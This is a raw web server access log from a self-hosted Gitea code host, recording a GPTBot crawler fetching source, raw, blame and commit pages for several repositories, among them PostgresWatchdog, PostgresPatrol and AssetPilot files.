"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15943] [Gzip 8.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" -[17/Feb/2026:13:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 22472] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" -[17/Feb/2026:13:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" -[17/Feb/2026:13:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" -[17/Feb/2026:13:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" -[17/Feb/2026:13:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" -[17/Feb/2026:13:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:13:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:13:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 12292] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 4329948] [Gzip 20.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:13:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 10877] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:13:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 10883] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" -[17/Feb/2026:13:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9904] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:13:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9487] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:13:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10958571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:13:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 11471] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:13:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:13:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" -[17/Feb/2026:13:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" -[17/Feb/2026:13:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14351] [Gzip 27.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" -[17/Feb/2026:13:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" -[17/Feb/2026:13:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 709] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:13:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:13:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 4330017] [Gzip 20.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:13:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 9910] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:13:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009110] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 9496] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:13:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 10962886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:13:54:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:54:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:54:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" -[17/Feb/2026:13:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11179] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" -[17/Feb/2026:13:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11270] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" -[17/Feb/2026:13:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" -[17/Feb/2026:13:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr 